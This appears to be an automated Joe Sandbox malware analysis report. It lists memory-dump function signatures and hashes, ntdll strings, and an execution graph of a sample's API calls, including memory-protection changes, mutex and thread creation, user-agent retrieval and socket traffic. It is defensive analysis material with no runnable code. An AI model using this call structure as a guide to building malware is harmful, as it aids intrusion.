              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2266a76b47d3bf2a2d0d6f194ac9cb033b7ac89f5ed6cc41bb9c29e78cc15f1f
              • Instruction ID: a1091cbeb686316517bc844c5b2e529672ff1e15a1f8768d77cf280f47c138f2
              • Opcode Fuzzy Hash: 2266a76b47d3bf2a2d0d6f194ac9cb033b7ac89f5ed6cc41bb9c29e78cc15f1f
              • Instruction Fuzzy Hash: 66900231611C0542D10171594908747000597E0302F55C022A516459AEC775C9D16A31
              Function 013F2E30 Relevance: .0, Instructions: 4COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9cad8e289d5f6c99701f0e10c218dc21be724928e7637dd8a5f10eeac9c364f0
              • Instruction ID: 90330c20661c63f0ac9b86242fa71860f4210550e732bd6e1a9af00a2efaad45
              • Opcode Fuzzy Hash: 9cad8e289d5f6c99701f0e10c218dc21be724928e7637dd8a5f10eeac9c364f0
              • Instruction Fuzzy Hash: CB90022171180542D103715945146060009D7E1345F95C023E142459ADC7358A93A632
              Function 013F2EE0 Relevance: .0, Instructions: 4COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 71296ffb3c4f9be620fddc2bad126d3ae3d7cfcd0b2a9e187cac689105b69932
              • Instruction ID: 5402445b3ace3a1da0fe62cd1424fcce05f216c351e1132ed56542df47d6df06
              • Opcode Fuzzy Hash: 71296ffb3c4f9be620fddc2bad126d3ae3d7cfcd0b2a9e187cac689105b69932
              • Instruction Fuzzy Hash: 59900261611C0543D14175594904607000597E0302F55C022A206459AECB398D916635
              Function 013F2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
              • Instruction ID: faa3bc59d46e19ae98341e378f68584edea85760f0a4875d322f4af6ff072fb0
              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
              • Instruction Fuzzy Hash:
              Function 013F2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
              • API String ID: 48624451-2108815105
              • Opcode ID: 1244f56d97af716811ddd555e34c987ca927a22b16d8ce629dd22015651e8d28
              • Instruction ID: a266b93fb5b0c99f81f6d290c39fc841dc06b73669f5991b5f6ee6d91bda4f52
              • Opcode Fuzzy Hash: 1244f56d97af716811ddd555e34c987ca927a22b16d8ce629dd22015651e8d28
              • Instruction Fuzzy Hash: 8651E6B6A00256BFCB11DFAD889097FFBB8BB08244B54826EF565D7A41D334DE5087E0
              Function 01462410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
              • API String ID: 48624451-2108815105
              • Opcode ID: 05e39ef9031ce2fec27fb0bf44520a13806ded3187d72957e25f11329f7f395a
              • Instruction ID: f8efc385ed3ec2e773829c9eb5b5935babcb0e74d25c0de1713a568a52301c8e
              • Opcode Fuzzy Hash: 05e39ef9031ce2fec27fb0bf44520a13806ded3187d72957e25f11329f7f395a
              • Instruction Fuzzy Hash: 25510371A00646BACB30DF9DC990D7FBBBCEB44208B40842BE4D6D7791E6B4DA408761
              Function 013E7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
              Download Yara Rule
              Strings
              • Execute=1, xrefs: 01424713
              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01424655
              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014246FC
              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01424742
              • ExecuteOptions, xrefs: 014246A0
              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01424787
              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01424725
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
              • API String ID: 0-484625025
              • Opcode ID: f5720daf4d80a7e41b5c1d3c7c388ea0e12336b8aa7608e19e6113d068406302
              • Instruction ID: 11faaafb5c500d36b2864bd0e7888c6171748580a3c3028787132119c45e0d9f
              • Opcode Fuzzy Hash: f5720daf4d80a7e41b5c1d3c7c388ea0e12336b8aa7608e19e6113d068406302
              • Instruction Fuzzy Hash: 46512D3160032ABAEF21ABA9DC89FFA77E8EF5431CF44009DD605AB1D1D7719A458F90
              Function 013FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-$0$0
              • API String ID: 1302938615-699404926
              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
              • Instruction ID: 9bb8804a780b6066669730f2c663ed6393cb39a9b6b08c9fe89c0bd8fbe894c0
              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
              • Instruction Fuzzy Hash: 6281D2B0E052498EEF258E6CC8517FEFFB6AF85368F18411DDA61A7299C7348840CB61
              Function 013EBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
              Download Yara Rule
              Strings
              • RTL: Resource at %p, xrefs: 01427B8E
              • RTL: Re-Waiting, xrefs: 01427BAC
              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01427B7F
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 0-871070163
              • Opcode ID: 06453a71e0cc922cf444c97b90c55802d08b7bc534851c5eb2f5c55e57faf66c
              • Instruction ID: c1ac3d1430c5b654c7c720bd93a52d2b674140b5de215feed1962bd9980d021c
              • Opcode Fuzzy Hash: 06453a71e0cc922cf444c97b90c55802d08b7bc534851c5eb2f5c55e57faf66c
              • Instruction Fuzzy Hash: 8C4125317007169FDB21CE29C840B27B7E5EF98715F000A1EFA5AD7790DB31E84A8B91
              Function 013EB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
              Download Yara Rule
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0142728C
              Strings
              • RTL: Resource at %p, xrefs: 014272A3
              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01427294
              • RTL: Re-Waiting, xrefs: 014272C1
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 885266447-605551621
              • Opcode ID: 999527f9837cf713b0891e26e501961bb2672c17ed5e57845da7b24f36e06e2c
              • Instruction ID: 7054f2fa225822dde4af37501e61fad5d78da4e837064f67b4bfdc68c9880aaa
              • Opcode Fuzzy Hash: 999527f9837cf713b0891e26e501961bb2672c17ed5e57845da7b24f36e06e2c
              • Instruction Fuzzy Hash: E7411031600326ABD722CF29CC41B26B7A5FBA5715F10061AF945EB3A0DB31E8528BE1
              Function 01462300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: %%%u$]:%u
              • API String ID: 48624451-3050659472
              • Opcode ID: 33e3c4aa68d691d2a633beebf391008f02696f59e6037772c1e34b2382ef84f3
              • Instruction ID: 29cdd1b7ad2176b50c8a595699087541749713fb89703c1eeb08ef207d646bb7
              • Opcode Fuzzy Hash: 33e3c4aa68d691d2a633beebf391008f02696f59e6037772c1e34b2382ef84f3
              • Instruction Fuzzy Hash: 85318472A00219AFDB60DE3DCC40FEF77BCEB54654F84055BE949E3250EB709A848BA1
              Function 013F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-
              • API String ID: 1302938615-2137968064
              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
              • Instruction ID: b741cee594843c46f6816475e7e011b76d5b36f70382c164fa2da48695b9921c
              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
              • Instruction Fuzzy Hash: 1D91B171E0030A9BEF24DF6DC881ABEBBA5EF44328F54461EEB65E72C0D73099458B11
              Function 013B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: $$@
              • API String ID: 0-1194432280
              • Opcode ID: 09ded741acb4b3bbb7aaac159a7e0f6777b34abdd2358d0b194b68fa15e537c5
              • Instruction ID: 4a2408a5372249086fbc920484b452fca8ab5367028de4c8a4f784e2cdf99e16
              • Opcode Fuzzy Hash: 09ded741acb4b3bbb7aaac159a7e0f6777b34abdd2358d0b194b68fa15e537c5
              • Instruction Fuzzy Hash: 9A811B71D002699BDB359B54CC44BEEBBB4AF08714F1041EAEA1DB7690E7705E85CFA0

              Execution Graph

              Execution Coverage:2.3%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:4.7%
              Total number of Nodes:446
              Total number of Limit Nodes:17
              execution_graph 13808 f88714a 13809 f887153 13808->13809 13811 f887174 13808->13811 13810 f889382 ObtainUserAgentString 13809->13810 13813 f88716c 13810->13813 13812 f8871e7 13811->13812 13816 f8821f2 13811->13816 13814 f8820f2 6 API calls 13813->13814 13814->13811 13817 f8822c9 13816->13817 13818 f88220f 13816->13818 13817->13811 13819 f882242 13818->13819 13820 f88cf12 7 API calls 13818->13820 13821 f882289 13819->13821 13823 f883432 NtCreateFile 13819->13823 13820->13819 13821->13817 13822 f8820f2 6 API calls 13821->13822 13822->13817 13823->13821 13932 f88ee0a 13933 f88d942 13932->13933 13934 f88ee45 NtProtectVirtualMemory 13933->13934 13935 f88ee70 13934->13935 13968 f88fa4d 13969 f88fa53 13968->13969 13972 f883782 13969->13972 13971 f88fa6b 13974 f88378f 13972->13974 13973 f8837ad 13973->13971 13974->13973 13975 f888662 6 API calls 13974->13975 13975->13973 13721 f88df82 13723 f88dfb8 13721->13723 13722 f88e022 13723->13722 13724 f88a5b2 socket 13723->13724 13725 f88e081 13723->13725 13724->13725 13725->13722 13726 f88e134 13725->13726 13728 f88e117 getaddrinfo 13725->13728 13726->13722 13727 f88a732 connect 13726->13727 13729 f88e1b2 13726->13729 13727->13729 13728->13726 13729->13722 13730 f88a6b2 send 13729->13730 13732 f88e729 13730->13732 13731 f88e7f4 setsockopt recv 13731->13722 13732->13722 13732->13731 13774 f885dd9 13776 f885df0 13774->13776 13775 f885ecd 13776->13775 13777 f889382 ObtainUserAgentString 13776->13777 13777->13775 13630 f8822dd 13633 f88231a 13630->13633 13631 f8823fa 13632 f882328 SleepEx 13632->13632 13632->13633 13633->13631 13633->13632 13637 f88cf12 13633->13637 13646 f883432 13633->13646 13656 f8820f2 13633->13656 13643 f88cf48 13637->13643 13638 f88d134 13638->13633 13639 f88d0e9 13640 f88d125 13639->13640 13674 f88c842 13639->13674 13682 f88c922 13640->13682 13643->13638 13643->13639 13645 f88d232 NtCreateFile 13643->13645 13662 f88df82 13643->13662 13645->13643 13647 f88345b 13646->13647 13655 f8834c9 13646->13655 13648 f88d232 NtCreateFile 13647->13648 13647->13655 13649 f883496 13648->13649 13654 f8834c5 13649->13654 13703 f883082 13649->13703 13650 f88d232 NtCreateFile 13650->13655 13652 f8834b6 13652->13654 13712 f882f52 13652->13712 13654->13650 13654->13655 13655->13633 13657 f882109 13656->13657 13658 f8821d3 13656->13658 13717 f882012 13657->13717 13658->13633 13660 f882113 13660->13658 13661 f88df82 6 API calls 13660->13661 13661->13658 13664 f88dfb8 13662->13664 13663 f88e022 13663->13643 13664->13663 13666 f88e081 13664->13666 13690 f88a5b2 13664->13690 13666->13663 13667 f88e134 13666->13667 13669 f88e117 getaddrinfo 13666->13669 13667->13663 13670 f88e1b2 13667->13670 13693 f88a732 13667->13693 13669->13667 13670->13663 13696 f88a6b2 13670->13696 13672 f88e7f4 setsockopt recv 13672->13663 13673 f88e729 13673->13663 13673->13672 13675 f88c86d 13674->13675 13699 f88d232 13675->13699 13677 f88c906 13677->13639 13678 f88c888 13678->13677 13679 f88df82 6 API calls 13678->13679 13680 f88c8c5 13678->13680 13679->13680 13680->13677 13681 f88d232 NtCreateFile 13680->13681 13681->13677 13683 f88c9c2 13682->13683 13684 f88d232 NtCreateFile 13683->13684 13686 f88c9d6 13684->13686 13685 f88ca9f 13685->13638 13686->13685 13687 f88ca5d 13686->13687 13689 f88df82 6 API calls 13686->13689 13687->13685 13688 f88d232 NtCreateFile 13687->13688 13688->13685 13689->13687 13691 f88a60a socket 13690->13691 13692 f88a5ec 13690->13692 13691->13666 13692->13691 13694 f88a788 connect 13693->13694 13695 f88a76a 13693->13695 13694->13670 13695->13694 13697 f88a705 send 13696->13697 13698 f88a6e7 13696->13698 13697->13673 13698->13697 13700 f88d334 13699->13700 13701 f88d25c 13699->13701 13700->13678 13701->13700 13702 f88d410 NtCreateFile 13701->13702 13702->13700 13704 f883420 13703->13704 13705 f8830aa 13703->13705 13704->13652 13705->13704 13706 f88d232 NtCreateFile 13705->13706 13708 f8831f9 13706->13708 13707 f8833df 13707->13652 13708->13707 13709 f88d232 NtCreateFile 13708->13709 13710 f8833c9 13709->13710 13711 f88d232 NtCreateFile 13710->13711 13711->13707 13713 f882f70 13712->13713 13714 f882f84 13712->13714 13713->13654 13715 f88d232 NtCreateFile 13714->13715 13716 f883046 13715->13716 13716->13654 13718 f882031 13717->13718 13719 f8820cd 13718->13719 13720 f88df82 6 API calls 13718->13720 13719->13660 13720->13719 13860 f885edd 13862 f885f06 13860->13862 13861 f885fa4 13862->13861 13863 f8828f2 NtProtectVirtualMemory 13862->13863 13864 f885f9c 13863->13864 13865 f889382 ObtainUserAgentString 13864->13865 13865->13861 13936 f88fa1f 13937 f88fa25 13936->13937 13940 f8835f2 13937->13940 13939 f88fa3d 13941 f8835fb 13940->13941 13942 f88360e 13940->13942 13941->13942 13943 f888662 6 API calls 13941->13943 13942->13939 13943->13942 13737 f88ee12 13738 f88ee45 NtProtectVirtualMemory 13737->13738 13739 f88d942 13737->13739 13740 f88ee70 13738->13740 13739->13738 13944 f883613 13945 f883620 13944->13945 13946 f883684 13945->13946 13947 f88ee12 NtProtectVirtualMemory 13945->13947 13947->13945 13866 f887cd4 13868 f887cd8 13866->13868 13867 f888022 13868->13867 13872 f887352 13868->13872 13870 f887f0d 13870->13867 13881 f887792 13870->13881 13873 f88739e 13872->13873 13874 f88758e 13873->13874 13875 f8874ec 13873->13875 13877 f887595 13873->13877 13874->13870 13876 f88d232 NtCreateFile 13875->13876 13879 f8874ff 13876->13879 13877->13874 13878 f88d232 NtCreateFile 13877->13878 13878->13874 13879->13874 13880 f88d232 NtCreateFile 13879->13880 13880->13874 13882 f8877e0 13881->13882 13883 f88d232 NtCreateFile 13882->13883 13885 f88790c 13883->13885 13884 f887af3 13884->13870 13885->13884 13886 f887352 NtCreateFile 13885->13886 13887 f887602 NtCreateFile 13885->13887 13886->13885 13887->13885 13844 f88faa9 13845 f88faaf 13844->13845 13848 f88a212 13845->13848 13847 f88fac7 13849 f88a21b 13848->13849 13850 f88a237 13848->13850 13849->13850 13851 f88a0c2 6 API calls 13849->13851 13850->13847 13851->13850 13948 f88922a 13949 f88925e 13948->13949 13950 f8888c2 ObtainUserAgentString 13949->13950 13951 f88926b 13950->13951 13481 f88ebac 13482 f88ebb1 13481->13482 13515 f88ebb6 13482->13515 13516 f884b72 13482->13516 13484 f88ec2c 13485 f88ec85 13484->13485 13486 f88ec69 13484->13486 13487 f88ec54 13484->13487 13484->13515 13488 f88cab2 NtProtectVirtualMemory 13485->13488 13490 f88ec6e 13486->13490 13491 f88ec80 13486->13491 13489 f88cab2 NtProtectVirtualMemory 13487->13489 13492 f88ec8d 13488->13492 13493 f88ec5c 13489->13493 13494 f88cab2 NtProtectVirtualMemory 13490->13494 13491->13485 13495 f88ec97 13491->13495 13553 f886102 13492->13553 13539 f885ee2 13493->13539 13499 f88ec76 13494->13499 13497 f88ecbe 13495->13497 13501 f88ec9c 13495->13501 13502 f88ecd9 13497->13502 13503 f88ecc7 13497->13503 13497->13515 13545 f885fc2 13499->13545 13520 f88cab2 13501->13520 13506 f88cab2 NtProtectVirtualMemory 13502->13506 13502->13515 13505 f88cab2 NtProtectVirtualMemory 13503->13505 13508 f88eccf 13505->13508 13510 f88ece5 13506->13510 13507 f88ecac 13531 f885de2 13507->13531 13563 f8862f2 13508->13563 13581 f886712 13510->13581 13518 f884b93 13516->13518 13517 f884cce 13517->13484 13518->13517 13519 f884cb5 CreateMutexW 13518->13519 13519->13517 13521 f88cadf 13520->13521 13522 f88cef1 13521->13522 13523 f88cebc 13521->13523 13593 f8828f2 13521->13593 13522->13507 13523->13507 13525 f88ce5c 13526 f8828f2 NtProtectVirtualMemory 13525->13526 13527 f88ce7c 13526->13527 13528 f8828f2 NtProtectVirtualMemory 13527->13528 13529 f88ce9c 13528->13529 13530 f8828f2 NtProtectVirtualMemory 13529->13530 13530->13523 13532 f885df0 13531->13532 13534 f885ecd 13532->13534 13618 f889382 13532->13618 13535 f882412 13534->13535 13537 f882440 13535->13537 13536 f882473 13536->13515 13537->13536 13538 f88244d CreateThread 13537->13538 13538->13515 13541 f885f06 13539->13541 13540 f885fa4 13540->13515 13541->13540 13542 f8828f2 NtProtectVirtualMemory 13541->13542 13543 f885f9c 13542->13543 13544 f889382 ObtainUserAgentString 13543->13544 13544->13540 13547 f886016 13545->13547 13546 f8860f0 13546->13515 13547->13546 13550 f8860bb 13547->13550 13551 f8828f2 NtProtectVirtualMemory 13547->13551 13548 f8860e8 13549 f889382 ObtainUserAgentString 13548->13549 13549->13546 13550->13548 13552 f8828f2 NtProtectVirtualMemory 13550->13552 13551->13550 13552->13548 13555 f886137 13553->13555 13554 f8862d5 13554->13515 13555->13554 13556 f8828f2 NtProtectVirtualMemory 13555->13556 13557 f88628a 13556->13557 13558 f8828f2 NtProtectVirtualMemory 13557->13558 13561 f8862a9 13558->13561 13559 f8862cd 13560 f889382 ObtainUserAgentString 13559->13560 13560->13554 13561->13559 13562 f8828f2 NtProtectVirtualMemory 13561->13562 13562->13559 13564 f886349 13563->13564 13565 f88649f 13564->13565 13567 f8828f2 NtProtectVirtualMemory 13564->13567 13566 f8828f2 NtProtectVirtualMemory 13565->13566 13570 f8864c3 13565->13570 13566->13570 13568 f886480 13567->13568 13569 f8828f2 NtProtectVirtualMemory 13568->13569 13569->13565 13571 f8828f2 NtProtectVirtualMemory 13570->13571 13572 f886597 13570->13572 13571->13572 13573 f8828f2 NtProtectVirtualMemory 13572->13573 13575 f8865bf 13572->13575 13573->13575 13574 f8866e1 13576 f889382 ObtainUserAgentString 13574->13576 13577 f8828f2 NtProtectVirtualMemory 13575->13577 13578 f8866b9 13575->13578 13579 f8866e9 13576->13579 13577->13578 13578->13574 13580 f8828f2 NtProtectVirtualMemory 13578->13580 13579->13515 13580->13574 13582 f886767 13581->13582 13583 f8828f2 NtProtectVirtualMemory 13582->13583 13586 f886903 13582->13586 13584 f8868e3 13583->13584 13585 f8828f2 NtProtectVirtualMemory 13584->13585 13585->13586 13589 f8828f2 NtProtectVirtualMemory 13586->13589 13590 f886992 13586->13590 13587 f8869b7 13588 f889382 ObtainUserAgentString 13587->13588 13591 f8869bf 13588->13591 13589->13590 13590->13587 13592 f8828f2 NtProtectVirtualMemory 13590->13592 13591->13515 13592->13587 13594 f882987 13593->13594 13597 f8829b2 13594->13597 13608 f883622 13594->13608 13596 f882c0c 13596->13525 13597->13596 13598 f882ba2 13597->13598 13600 f882ac5 13597->13600 13599 f88ee12 NtProtectVirtualMemory 13598->13599 13607 f882b5b 13599->13607 13612 f88ee12 13600->13612 13602 f88ee12 NtProtectVirtualMemory 13602->13596 13603 f882ae3 13603->13596 13604 f882b3d 13603->13604 13605 f88ee12 NtProtectVirtualMemory 13603->13605 13606 f88ee12 NtProtectVirtualMemory 13604->13606 13605->13604 13606->13607 13607->13596 13607->13602 13610 f88367a 13608->13610 13609 f883684 13609->13597 13610->13609 13611 f88ee12 NtProtectVirtualMemory 13610->13611 13611->13610 13613 f88ee45 NtProtectVirtualMemory 13612->13613 13616 f88d942 13612->13616 13615 f88ee70 13613->13615 13615->13603 13617 f88d967 13616->13617 13617->13613 13619 f8893c7 13618->13619 13622 f889232 13619->13622 13621 f889438 13621->13534 13623 f88925e 13622->13623 13626 f8888c2 13623->13626 13625 f88926b 13625->13621 13628 f888934 13626->13628 13627 f8889a6 13627->13625 13628->13627 13629 f888995 ObtainUserAgentString 13628->13629 13629->13627 13805 f88a72e 13806 f88a788 connect 13805->13806 13807 f88a76a 13805->13807 13807->13806 13952 f88342e 13953 f88345b 13952->13953 13961 f8834c9 13952->13961 13954 f88d232 NtCreateFile 13953->13954 13953->13961 13955 f883496 13954->13955 13956 f8834c5 13955->13956 13958 f883082 NtCreateFile 13955->13958 13957 f88d232 NtCreateFile 13956->13957 13956->13961 13957->13961 13959 f8834b6 13958->13959 13959->13956 13960 f882f52 NtCreateFile 13959->13960 13960->13956 13888 f887ce2 13890 f887dd9 13888->13890 13889 f888022 13890->13889 13891 f887352 NtCreateFile 13890->13891 13892 f887f0d 13891->13892 13892->13889 13893 f887792 NtCreateFile 13892->13893 13893->13892 13894 f88a2e4 13895 f88a36f 13894->13895 13896 f88a305 13894->13896 13896->13895 13897 f88a0c2 6 API calls 13896->13897 13897->13895 13824 f884b66 13826 f884b6a 13824->13826 13825 f884cce 13826->13825 13827 f884cb5 CreateMutexW 13826->13827 13827->13825 13852 f88a0b9 13853 f88a0ed 13852->13853 13855 f88a1f0 13852->13855 13854 f88df82 6 API calls 13853->13854 13853->13855 13854->13855 13828 f88df7a 13829 f88dfb8 13828->13829 13830 f88a5b2 socket 13829->13830 13831 f88e081 13829->13831 13836 f88e022 13829->13836 13830->13831 13832 f88e134 13831->13832 13834 f88e117 getaddrinfo 13831->13834 13831->13836 13833 f88a732 connect 13832->13833 13835 f88e1b2 13832->13835 13832->13836 13833->13835 13834->13832 13835->13836 13837 f88a6b2 send 13835->13837 13839 f88e729 13837->13839 13838 f88e7f4 setsockopt recv 13838->13836 13839->13836 13839->13838 13962 f88c83a 13963 f88c841 13962->13963 13964 f88df82 6 API calls 13963->13964 13965 f88c8c5 13964->13965 13966 f88c906 13965->13966 13967 f88d232 NtCreateFile 13965->13967 13967->13966 13898 f8860fb 13900 f886137 13898->13900 13899 f8862d5 13900->13899 13901 f8828f2 NtProtectVirtualMemory 13900->13901 13902 f88628a 13901->13902 13903 f8828f2 NtProtectVirtualMemory 13902->13903 13906 f8862a9 13903->13906 13904 f8862cd 13905 f889382 ObtainUserAgentString 13904->13905 13905->13899 13906->13904 13907 f8828f2 NtProtectVirtualMemory 13906->13907 13907->13904 13856 f8888be 13857 f8888c3 13856->13857 13858 f888995 ObtainUserAgentString 13857->13858 13859 f8889a6 13857->13859 13858->13859 13745 f885fbf 13747 f886016 13745->13747 13746 f8860f0 13747->13746 13750 f8860bb 13747->13750 13751 f8828f2 NtProtectVirtualMemory 13747->13751 13748 f8860e8 13749 f889382 ObtainUserAgentString 13748->13749 13749->13746 13750->13748 13752 f8828f2 NtProtectVirtualMemory 13750->13752 13751->13750 13752->13748 13778 f8835f1 13779 f88360e 13778->13779 13780 f883606 13778->13780 13782 f888662 13780->13782 13783 f88866b 13782->13783 13789 f8887ba 13782->13789 13784 f8820f2 6 API calls 13783->13784 13783->13789 13785 f8886ee 13784->13785 13786 f888750 13785->13786 13787 f88df82 6 API calls 13785->13787 13788 f88883f 13786->13788 13786->13789 13790 f888791 13786->13790 13787->13786 13788->13789 13791 f88df82 6 API calls 13788->13791 13789->13779 13790->13789 13792 f88df82 6 API calls 13790->13792 13791->13789 13792->13789 13793 f88f9f1 13794 f88f9f7 13793->13794 13797 f884852 13794->13797 13796 f88fa0f 13798 f8848e4 13797->13798 13799 f884865 13797->13799 13798->13796 13799->13798 13801 f884887 13799->13801 13803 f88487e 13799->13803 13800 f88a36f 13800->13796 13801->13798 13802 f888662 6 API calls 13801->13802 13802->13798 13803->13800 13804 f88a0c2 6 API calls 13803->13804 13804->13800 13908 f8820f1 13909 f882109 13908->13909 13913 f8821d3 13908->13913 13910 f882012 6 API calls 13909->13910 13911 f882113 13910->13911 13912 f88df82 6 API calls 13911->13912 13911->13913 13912->13913 13741 f88d232 13742 f88d334 13741->13742 13743 f88d25c 13741->13743 13743->13742 13744 f88d410 NtCreateFile 13743->13744 13744->13742 13753 f88f9b3 13754 f88f9bd 13753->13754 13757 f8846d2 13754->13757 13756 f88f9e0 13758 f884704 13757->13758 13759 f8846f7 13757->13759 13761 f8846ff 13758->13761 13762 f88472d 13758->13762 13764 f884737 13758->13764 13760 f8820f2 6 API calls 13759->13760 13760->13761 13761->13756 13766 f88a2c2 13762->13766 13764->13761 13765 f88df82 6 API calls 13764->13765 13765->13761 13767 f88a2cb 13766->13767 13768 f88a2df 13766->13768 13767->13768 13770 f88a0c2 13767->13770 13768->13761 13771 f88a1f0 13770->13771 13772 f88a0cb 13770->13772 13771->13768 13772->13771 13773 f88df82 6 API calls 13772->13773 13773->13771 13914 f8862f4 13915 f886349 